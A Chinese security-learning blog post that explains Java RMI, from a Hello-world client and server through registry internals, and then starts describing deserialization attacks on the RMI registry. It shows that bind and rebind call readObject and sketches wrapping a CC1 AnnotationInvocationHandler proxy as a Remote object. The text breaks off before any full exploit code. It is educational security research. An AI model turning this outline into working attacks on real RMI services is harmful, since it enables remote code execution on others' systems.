<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>RMI机制分析 | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="什么是RMIJava RMI（Remote Method Invocation，远程方法调用）是一种用于在分布式系统中进行远程通信的机制。它允许一个Java虚拟机（JVM）上的对象调用另一个JVM上的对象方法，就像调用本地方法一样。 RMI 的核心概念 远程对象：存在于远程JVM中的对象，客户端可以通过网络调用其方法。 存根（Stub）和骨架（Skeleton）： Stub：客户端的代理，负责将调">
<meta property="og:type" content="article">
<meta property="og:title" content="RMI机制分析">
<meta property="og:url" content="http://example.com/2025/03/07/RMI/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="什么是RMIJava RMI（Remote Method Invocation，远程方法调用）是一种用于在分布式系统中进行远程通信的机制。它允许一个Java虚拟机（JVM）上的对象调用另一个JVM上的对象方法，就像调用本地方法一样。 RMI 的核心概念 远程对象：存在于远程JVM中的对象，客户端可以通过网络调用其方法。 存根（Stub）和骨架（Skeleton）： Stub：客户端的代理，负责将调">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/images/2025/1741140279814-b3e8a760-bf7f-42a2-8206-4ba536e047e6.png">
<meta property="og:image" content="http://example.com/images/2025/1741138513291-0477b991-6396-4855-98e7-61757f0dffc6.png">
<meta property="og:image" content="http://example.com/images/2025/1741138527974-79a837bd-3105-4fca-b135-1a1fab6c9c76.png">
<meta property="og:image" content="http://example.com/images/2025/1741317009087-fc9e19e0-4c6c-440b-ba3c-63ff8aca5d84.png">
<meta property="og:image" content="http://example.com/images/2025/1741696696080-556b2584-ca59-4bbc-ade4-65463c434b9f.png">
<meta property="og:image" content="http://example.com/images/2025/1741696747458-921919dc-d259-4b48-a678-0877d6ae9fff.png">
<meta property="og:image" content="http://example.com/images/2025/1741697476446-b0c682af-63d2-403a-9520-389600ea650a.png">
<meta property="og:image" content="http://example.com/images/2025/1741697747756-4f85c917-2521-41aa-a52e-aebbc75d18b5.png">
<meta property="og:image" content="http://example.com/images/2025/1741662946453-99108857-314f-4953-8332-4d94ddf9ab02.png">
<meta property="og:image" content="http://example.com/images/2025/1741663417831-77bef841-8e23-423b-846b-10c005670267.png">
<meta property="og:image" content="http://example.com/images/2025/1741694237281-9c59accc-5073-49a3-8615-f1ef0172cb6f.png">
<meta property="og:image" content="http://example.com/images/2025/1741694305872-67ccf8b9-24c9-4db0-b9bf-f7926b3d72d6.png">
<meta property="og:image" content="http://example.com/images/2025/1741694365724-02232eed-4adb-4a00-b330-2bdbaeff1cc8.png">
<meta property="article:published_time" content="2025-03-07T10:30:00.000Z">
<meta property="article:modified_time" content="2026-03-07T10:23:03.430Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/2025/1741140279814-b3e8a760-bf7f-42a2-8206-4ba536e047e6.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<meta name="generator" content="Hexo 7.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-RMI" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2025/03/07/RMI/" class="article-date">
  <time class="dt-published" datetime="2025-03-07T10:30:00.000Z" itemprop="datePublished">2025-03-07</time>
</a>
    
  <div class="article-category">
    <a class="article-category-link" href="/categories/java%E5%AE%89%E5%85%A8/">java安全</a>
  </div>

  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      RMI机制分析
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="什么是RMI"><a href="#什么是RMI" class="headerlink" title="什么是RMI"></a><font style="color:rgb(64, 64, 64);">什么是RMI</font></h1><p><font style="color:rgb(64, 64, 64);">Java RMI（Remote Method Invocation，远程方法调用）是一种用于在分布式系统中进行远程通信的机制。它允许一个Java虚拟机（JVM）上的对象调用另一个JVM上的对象方法，就像调用本地方法一样。</font></p>
<h3 id="RMI-的核心概念"><a href="#RMI-的核心概念" class="headerlink" title="RMI 的核心概念"></a><font style="color:rgb(64, 64, 64);">RMI 的核心概念</font></h3><ol>
<li><strong><font style="color:rgb(64, 64, 64);">远程对象</font></strong><font style="color:rgb(64, 64, 64);">：存在于远程JVM中的对象，客户端可以通过网络调用其方法。</font></li>
<li><strong><font style="color:rgb(64, 64, 64);">存根（Stub）和骨架（Skeleton）</font></strong><font style="color:rgb(64, 64, 64);">：</font><ul>
<li><strong><font style="color:rgb(64, 64, 64);">Stub</font></strong><font style="color:rgb(64, 64, 64);">：客户端的代理，负责将调用请求发送到远程对象。</font></li>
<li><strong><font style="color:rgb(64, 64, 64);">Skeleton</font></strong><font style="color:rgb(64, 64, 64);">：服务器端的代理，负责接收请求并调用实际对象的方法。</font></li>
</ul>
</li>
<li><strong><font style="color:rgb(64, 64, 64);">RMI Registry</font></strong><font style="color:rgb(64, 64, 64);">：一个简单的命名服务，客户端通过它查找远程对象的引用。</font></li>
</ol>
<h3 id="RMI-的工作流程"><a href="#RMI-的工作流程" class="headerlink" title="RMI 的工作流程"></a><font style="color:rgb(64, 64, 64);">RMI 的工作流程</font></h3><ol>
<li><strong><font style="color:rgb(64, 64, 64);">定义远程接口</font></strong><font style="color:rgb(64, 64, 64);">：接口必须继承</font><font style="color:rgb(64, 64, 64);"> </font><code>&lt;font style=&quot;color:rgb(64, 64, 64);&quot;&gt;java.rmi.Remote&lt;/font&gt;</code><font style="color:rgb(64, 64, 64);">，方法需声明抛出</font><font style="color:rgb(64, 64, 64);"> </font><code>&lt;font style=&quot;color:rgb(64, 64, 64);&quot;&gt;RemoteException&lt;/font&gt;</code><font style="color:rgb(64, 64, 64);">。</font></li>
<li><strong><font style="color:rgb(64, 64, 64);">实现远程接口</font></strong><font style="color:rgb(64, 64, 64);">：实现类通常继承</font><font style="color:rgb(64, 64, 64);"> </font><code>&lt;font style=&quot;color:rgb(64, 64, 64);&quot;&gt;UnicastRemoteObject&lt;/font&gt;</code><font style="color:rgb(64, 64, 64);">。</font></li>
<li><strong><font style="color:rgb(64, 64, 64);">启动RMI Registry</font></strong><font style="color:rgb(64, 64, 64);">：使用</font><font style="color:rgb(64, 64, 64);"> </font><code>&lt;font style=&quot;color:rgb(64, 64, 64);&quot;&gt;rmiregistry&lt;/font&gt;</code><font style="color:rgb(64, 64, 64);"> </font><font style="color:rgb(64, 64, 64);">命令启动注册表。</font></li>
<li><strong><font style="color:rgb(64, 64, 64);">注册远程对象</font></strong><font style="color:rgb(64, 64, 64);">：将远程对象绑定到RMI Registry。</font></li>
<li><strong><font style="color:rgb(64, 64, 64);">客户端查找远程对象</font></strong><font style="color:rgb(64, 64, 64);">：通过RMI Registry获取远程对象的引用并调用方法。</font></li>
</ol>
<h3 id="RMI-的用途"><a href="#RMI-的用途" class="headerlink" title="RMI 的用途"></a><font style="color:rgb(64, 64, 64);">RMI 的用途</font></h3><ol>
<li><strong><font style="color:rgb(64, 64, 64);">分布式计算</font></strong><font style="color:rgb(64, 64, 64);">：将任务分布到多台机器上执行。</font></li>
<li><strong><font style="color:rgb(64, 64, 64);">远程服务调用</font></strong><font style="color:rgb(64, 64, 64);">：客户端调用远程服务器上的服务。</font></li>
<li><strong><font style="color:rgb(64, 64, 64);">负载均衡</font></strong><font style="color:rgb(64, 64, 64);">：通过远程调用将请求分发到不同服务器。</font></li>
<li><strong><font style="color:rgb(64, 64, 64);">模块化设计</font></strong><font style="color:rgb(64, 64, 64);">：将系统拆分为多个独立模块，部署在不同服务器上。</font></li>
</ol>
<h3 id="实例分析"><a href="#实例分析" class="headerlink" title="实例分析"></a>实例分析</h3><h4 id="项目结构"><a href="#项目结构" class="headerlink" title="项目结构"></a>项目结构</h4><p>服务端跟用户端分处两个包，用户端的包不存在接口Hello的实现类</p>
<!-- 这是一张图片，ocr 内容为：RMI CLIENT CLIENT HELLO SERVER HELLO HELLOLMPL SERVER -->
<p><img src="/images/2025/1741140279814-b3e8a760-bf7f-42a2-8206-4ba536e047e6.png"></p>
<h4 id="源码"><a href="#源码" class="headerlink" title="源码"></a>源码</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.rmi.Remote;</span><br><span class="line"><span class="keyword">import</span> java.rmi.RemoteException;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">interface</span> <span class="title class_">Hello</span> <span class="keyword">extends</span> <span class="title class_">Remote</span> &#123;</span><br><span class="line">    String <span class="title function_">sayHello</span><span class="params">()</span> <span class="keyword">throws</span> RemoteException;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.rmi.server.UnicastRemoteObject;</span><br><span class="line"><span class="keyword">import</span> java.rmi.RemoteException;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">HelloImpl</span> <span class="keyword">extends</span> <span class="title class_">UnicastRemoteObject</span> <span class="keyword">implements</span> <span class="title class_">Hello</span> &#123;</span><br><span class="line">    <span class="keyword">protected</span> <span class="title function_">HelloImpl</span><span class="params">()</span> <span class="keyword">throws</span> RemoteException &#123;</span><br><span class="line">        <span class="built_in">super</span>();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">sayHello</span><span class="params">()</span> <span class="keyword">throws</span> RemoteException &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;I am Change!&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.rmi.registry.LocateRegistry;</span><br><span class="line"><span class="keyword">import</span> java.rmi.registry.Registry;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Server</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="type">HelloImpl</span> <span class="variable">obj</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">HelloImpl</span>();</span><br><span class="line">            <span class="comment">//启动注册表并绑定端口，默认为1099</span></span><br><span class="line">            <span class="type">Registry</span> <span class="variable">registry</span> <span class="operator">=</span> LocateRegistry.createRegistry(<span class="number">1099</span>);</span><br><span class="line">            <span class="comment">//远程对象绑定到RMI Registry</span></span><br><span class="line">            registry.bind(<span class="string">&quot;Change&quot;</span>, obj);</span><br><span class="line">            System.out.println(<span class="string">&quot;Server is ready.&quot;</span>);</span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">            System.err.println(<span class="string">&quot;Server exception: &quot;</span> + e.toString());</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.rmi.registry.LocateRegistry;</span><br><span class="line"><span class="keyword">import</span> java.rmi.registry.Registry;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Client</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="comment">//获取对应端口的注册表</span></span><br><span class="line">            <span class="type">Registry</span> <span class="variable">registry</span> <span class="operator">=</span> LocateRegistry.getRegistry(<span class="string">&quot;localhost&quot;</span>, <span class="number">1099</span>);</span><br><span class="line">            <span class="comment">//根据注册表寻找远程对象</span></span><br><span class="line">            <span class="type">Hello</span> <span class="variable">stub</span> <span class="operator">=</span> (Hello) registry.lookup(<span class="string">&quot;Change&quot;</span>);</span><br><span class="line">            <span class="type">String</span> <span class="variable">response</span> <span class="operator">=</span> stub.sayHello();</span><br><span class="line">            System.out.println(<span class="string">&quot;Response: &quot;</span> + response);</span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">            System.err.println(<span class="string">&quot;Client exception: &quot;</span> + e.toString());</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>注意：<font style="color:rgb(64, 64, 64);">客户端需要</font><strong><font style="color:rgb(64, 64, 64);">持有远程接口的定义</font></strong><font style="color:rgb(64, 64, 64);">，并通过 RMI 机制调用远程对象的方法。</font><strong><font style="color:rgb(64, 64, 64);">远程接口的实现仅在服务端完成</font></strong><font style="color:rgb(64, 64, 64);">。</font></p>
<h4 id="运行结果"><a href="#运行结果" class="headerlink" title="运行结果"></a><font style="color:rgb(64, 64, 64);">运行结果</font></h4><p>服务端</p>
<!-- 这是一张图片，ocr 内容为：运行 CLIENT X SERVER X "E:\安全工具\RE_JAVA -副本\JAVA_8U65_NEW\BIN\JAVA.EXE" SERVER IS READY. -->
<p><img src="/images/2025/1741138513291-0477b991-6396-4855-98e7-61757f0dffc6.png"></p>
<p>客户端</p>
<!-- 这是一张图片，ocr 内容为：CLIENT SERVER X \安全工具\RE_JAVA - 副本\JAVA_8U65_NEW\BIN\JAVA.EXE" RESPONSE: I AM CHANGE! -->
<p><img src="/images/2025/1741138527974-79a837bd-3105-4fca-b135-1a1fab6c9c76.png"></p>
<p>可以看到，客户端成功调用了服务端的远程对象HelloImpl的方法</p>
<h4 id="巩固"><a href="#巩固" class="headerlink" title="巩固"></a>巩固</h4><p><font style="color:rgb(64, 64, 64);">这里用一张图加深下理解</font></p>
<!-- 这是一张图片，ocr 内容为： -->
<p><img src="/images/2025/1741317009087-fc9e19e0-4c6c-440b-ba3c-63ff8aca5d84.png"></p>
<h1 id="通信原理"><a href="#通信原理" class="headerlink" title="通信原理"></a>通信原理</h1><p>我们从服务端发布对象开始，一步步从注册中心到客户端</p>
<h2 id="创建远程服务"><a href="#创建远程服务" class="headerlink" title="创建远程服务"></a>创建远程服务</h2><h3 id="发布远程对象"><a href="#发布远程对象" class="headerlink" title="发布远程对象"></a>发布远程对象</h3><p>远程对象类由服务端定义，我们跟进去</p>
<!-- 这是一张图片，ocr 内容为：CLASS SERVER PUBLIC PUBLIC STATIC VOID MAIN(STRING[] ARGS) { HELLOIMPL(); HELLOIMPL OBJ NEW ; LOCATEREGISTRY.CREATEREGISTRY( PORT: 1099); REGISTRY REGISTRY "CHANGE", OBJ); REGISTRY.BIND( NAME: SYSTEM.OUT.PRINTLN("SERVER IS READY."); (EXCEPTION E) { CATCH "SERVER EXCEPTION: " + E.TOSTRING()); SYSTEM.ERR.PRINTLN( E.PRINTSTACKTRACE 了 -->
<p><img src="/images/2025/1741696696080-556b2584-ca59-4bbc-ade4-65463c434b9f.png"></p>
<p>能看到继承了<code>UnicastRemoteObject</code></p>
<!-- 这是一张图片，ocr 内容为：UNICASTREMOTEOBJECT IMPLEMENTS LEE PUBLIC CLASS HELLOIMPL HELLO EXTENDS -->
<p><img src="/images/2025/1741696747458-921919dc-d259-4b48-a678-0877d6ae9fff.png"></p>
<p>进去看<code>UnicastRemoteObject</code>的构造方法，能顺着找到<code>exportObject</code></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">protected</span> <span class="title function_">UnicastRemoteObject</span><span class="params">(<span class="type">int</span> port)</span> <span class="keyword">throws</span> RemoteException</span><br><span class="line">&#123;</span><br><span class="line">    <span class="built_in">this</span>.port = port;</span><br><span class="line">    exportObject((Remote) <span class="built_in">this</span>, port);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>然后在<code>exportObject</code>能找到<code>UnicastServerRef</code></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> Remote <span class="title function_">exportObject</span><span class="params">(Remote obj, <span class="type">int</span> port)</span></span><br><span class="line">    <span class="keyword">throws</span> RemoteException</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">return</span> exportObject(obj, <span class="keyword">new</span> <span class="title class_">UnicastServerRef</span>(port));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>跟进能看到传入的port为0（默认的port）</p>
<!-- 这是一张图片，ocr 内容为：PUBLIC UNICASTSERVERREF(INT PORT) PORT:0  SUPER(NEW LIVEREF(PORT)); PORT: THIS.FORCESTUBUSE 三 FALSE;  THIS.HASHTOMETHOD_ MAP 三 NULL; THIS.FILTER 三 NULL; -->
<p><img src="/images/2025/1741697476446-b0c682af-63d2-403a-9520-389600ea650a.png"></p>
<p>再进入LiveRef，关注一下TCPEndpoint，TCPEndpoint 是一个网络请求的类，我们可以去看一下它的构造函数，传参进去一个 IP 与一个端口，也就是说传进去一个 IP 和一个端口，就可以进行网络请求。在RMI中TCPEndpoint被封装在了LiveEef，可知LiveRef应该是用于网络请求的</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="title function_">LiveRef</span><span class="params">(ObjID objID, <span class="type">int</span> port)</span> &#123;  </span><br><span class="line">    <span class="built_in">this</span>(objID, TCPEndpoint.getLocalEndpoint(port), <span class="literal">true</span>);  </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<!-- 这是一张图片，ocr 内容为：PUBLIC TCPENDPOINT(STRING HOST, INT PORT, RMICLIENTSOCKETFACTORY O CSF RMISERVERSOCKETFACTORY SSF) IF (HOST 三: NULL) HOST 三 ""; THIS.HOST 三 HOST;  THIS.PORT ; PORT; THIS.CSF CSF; THIS.SSF 三 SSF; -->
<p><img src="/images/2025/1741697747756-4f85c917-2521-41aa-a52e-aebbc75d18b5.png"></p>
<p>往下就没什么好看的了，我们回到<code>UnicastServerRef</code>，一路F7，能找到<font style="color:rgb(80, 80, 92);">Stub</font></p>
<h1 id="攻击方式"><a href="#攻击方式" class="headerlink" title="攻击方式"></a>攻击方式</h1><p>RMI通信的原理以后再深究，先来看看RMI的攻击方式</p>
<p><font style="color:rgb(80, 80, 92);">根据 RMI 的部分，有这么一些攻击方式</font></p>
<ul>
<li>攻击注册中心</li>
<li>攻击服务端</li>
<li>攻击客户端</li>
</ul>
<p>我们一个一个讲</p>
<h2 id="攻击注册中心"><a href="#攻击注册中心" class="headerlink" title="攻击注册中心"></a><font style="color:rgba(0, 0, 0, 0.85);">攻击注册中心</font></h2><p><font style="color:rgb(80, 80, 92);">我们与注册中心进行交互可以使用如下几种方式：</font></p>
<ul>
<li>list</li>
<li>bind</li>
<li>rebind</li>
<li>unbind</li>
<li>lookup</li>
</ul>
<p>这些方法的原型位于<code>RegistryImpl_Skel#dispatch</code>中的switch语句中，若存在对传入的对象使用readObject方法，则可利用，下面是case与方法的对应</p>
<ul>
<li>0 —– bind</li>
<li>1 —– list</li>
<li>2 —– lookup</li>
<li>3 —– rebind</li>
<li>4 —– unbind</li>
</ul>
<h3 id="list"><a href="#list" class="headerlink" title="list"></a>list</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">case</span> <span class="number">1</span>:</span><br><span class="line">    var2.releaseInputStream();</span><br><span class="line">    String[] var97 = var6.list();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        <span class="type">ObjectOutput</span> <span class="variable">var98</span> <span class="operator">=</span> var2.getResultStream(<span class="literal">true</span>);</span><br><span class="line">        var98.writeObject(var97);</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125; <span class="keyword">catch</span> (IOException var92) &#123;</span><br><span class="line">        <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">MarshalException</span>(<span class="string">&quot;error marshalling return&quot;</span>, var92);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>不存在readObject方法调用，利用面很窄</p>
<h3 id="bind-或-rebind-的攻击"><a href="#bind-或-rebind-的攻击" class="headerlink" title="bind 或 rebind 的攻击"></a>bind 或 rebind 的攻击</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">case</span> <span class="number">0</span>:</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        var11 = var2.getInputStream();</span><br><span class="line">        var7 = (String)var11.readObject();</span><br><span class="line">        var8 = (Remote)var11.readObject();</span><br><span class="line">    &#125; <span class="keyword">catch</span> (IOException var94) &#123;</span><br><span class="line">        <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">UnmarshalException</span>(<span class="string">&quot;error unmarshalling arguments&quot;</span>, var94);</span><br><span class="line">    &#125; <span class="keyword">catch</span> (ClassNotFoundException var95) &#123;</span><br><span class="line">        <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">UnmarshalException</span>(<span class="string">&quot;error unmarshalling arguments&quot;</span>, var95);</span><br><span class="line">    &#125; <span class="keyword">finally</span> &#123;</span><br><span class="line">        var2.releaseInputStream();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    var6.bind(var7, var8);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        var2.getResultStream(<span class="literal">true</span>);</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125; <span class="keyword">catch</span> (IOException var93) &#123;</span><br><span class="line">        <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">MarshalException</span>(<span class="string">&quot;error marshalling return&quot;</span>, var93);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">case</span> <span class="number">3</span>:</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        var11 = var2.getInputStream();</span><br><span class="line">        var7 = (String)var11.readObject();</span><br><span class="line">        var8 = (Remote)var11.readObject();</span><br><span class="line">    &#125; <span class="keyword">catch</span> (IOException var85) &#123;</span><br><span class="line">        <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">UnmarshalException</span>(<span class="string">&quot;error unmarshalling arguments&quot;</span>, var85);</span><br><span class="line">    &#125; <span class="keyword">catch</span> (ClassNotFoundException var86) &#123;</span><br><span class="line">        <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">UnmarshalException</span>(<span class="string">&quot;error unmarshalling arguments&quot;</span>, var86);</span><br><span class="line">    &#125; <span class="keyword">finally</span> &#123;</span><br><span class="line">        var2.releaseInputStream();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    var6.rebind(var7, var8);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        var2.getResultStream(<span class="literal">true</span>);</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125; <span class="keyword">catch</span> (IOException var84) &#123;</span><br><span class="line">        <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">MarshalException</span>(<span class="string">&quot;error marshalling return&quot;</span>, var84);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>可以看到方法调用了var2的readObject方法，bind和rebind都需要传入remote<font style="color:rgb(80, 80, 92);">对象</font></p>
<p>在客户端收到信息的时候是一个 Proxy 对象，让 Proxy 对象被执行的时候去调 <code>readObject()</code> 方法，可以先点进去 Proxy 对象看一看，其中有一个非常引人注目的方法 ———— <code>newProxyInstance()</code></p>
<!-- 这是一张图片，ocr 内容为：ATTACKREGISTRYEXP.JAVA PROXY.JAVA X ORIY DNOTNULL 702 @CALLERSENSITIVE OBJECT NEWPROXYINSTANCE(CLASSLOADER LOADER, PUBLIC STATIC 703  CLASS<?>[] INTERFACES, 704 705 INVOCATIONHANDLER H) THROWS ILLEGALARGUMENTEXCEPTION 706 707 OBJECTS.REQUIRENONNULL(H); 708 TZ0 FINAL 729 CONSTRUCTOR<?> CONS - CL.GETCONSTRUCTOR(CONSTRUCTORPARAMS)` FINAL INVOCATIONHANDLER IH ; H; 730 (!MODIFIER.ISPUBLIC(CL.GETMODIFIERS())) { IF 731 ACCESSCONTROLLER.DOPRIVILEGED(NEW PRIVILEGEDACTION<VOID>()() F 732 733  PUBLIC VOID RUN() { 安  CONS.SETACCESSIBLE(TRUE); 734 735 RETURN NULL; 736 H); 737 子 738 739 RETURN CONS.NEWINSTANCE(NEW OBJECT[]{H]); -->
<p><img src="/images/2025/1741662946453-99108857-314f-4953-8332-4d94ddf9ab02.png"></p>
<p>这个方法能接受InvocationHandler参数，而cc1尾部刚好是AnnotationInvocationHandler，所以我们可以先生成一个代理对象（Proxy）,然后用<font style="color:rgb(80, 80, 92);">Remote.class.cast将其转换为Remote对象</font></p>
